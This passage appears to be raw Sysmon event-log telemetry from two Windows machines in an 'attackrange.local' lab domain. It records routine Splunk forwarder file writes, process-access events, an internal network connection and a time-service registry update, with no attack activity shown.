AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0C9BF514EA090CBD3A2F2E65D76759F,SHA256=6B26CF539030D8E7701A3828007045F5610AE808B4C9392990C22C2A592D714C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083546Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:32.446{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D7AC8D8A094AE936E421F8BCBFBC77F,SHA256=9E04B924A1B9AC40ED027EAB3C1A334F58BB98C2CABE9321E13767A8C8348EF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083545Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:32.446{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E6FD39506FC6E70FBA62D84B312A15F,SHA256=D7DC9E365188D4BF346B08DCD49771DD5DDDCCD4B2F3BB92E89E91F2143B3AFA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083544Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:32.118{2FDD8D40-B517-615A-9701-00000000FD01}17601552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107677Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:32.132{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=102ED2942FAF6DFE6FEC80EA9DCEAE0B,SHA256=9ED728F26FBBC46C04F3047D007E298B61BC30F70DBDFBA1107603FF42E1E690,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107683Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:33.284{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A65BF0DA5362885FDEB7479983EFADEB,SHA256=BC9160415AAF5A934574256756141F2B63A9ABCAB330A5E264798F3926B3330E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083561Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.446{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E332CF0B439B06A11B1D521DDF7AE2E,SHA256=B6AE89A215FE599F391CAB864993C96C1969F0D96C4C17D822CC70BE207EF8F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107682Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:33.053{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083560Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B519-615A-9801-00000000FD01}3920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083559Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083558Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083557Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083556Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083555Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083554Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083553Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083552Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083551Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083550Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B519-615A-9801-00000000FD01}3920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083549Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.024{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B519-615A-9801-00000000FD01}3920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083548Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:33.025{2FDD8D40-B519-615A-9801-00000000FD01}3920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000107685Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:33.378{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51925-false10.0.1.12-8000- 23542300x8000000000000000107684Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:34.287{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ADAB6FF23DE110D081EDCDA5CB2DA00,SHA256=CC69D2F8CA6B54E56D95345EF2713D4EE74534D172C2AC43C3BB4CE0754A1F7B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083579Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:32.720{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50178-false10.0.1.12-8000- 13241300x800000000000000083578Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:02:34.852{2FDD8D40-AC9A-615A-1000-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f6-0x30a866ae) 10341000x800000000000000083577Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.618{2FDD8D40-B51A-615A-9901-00000000FD01}32602296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083576Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.462{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B51A-615A-9901-00000000FD01}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083575Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083574Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083573Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083572Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083571Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083570Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 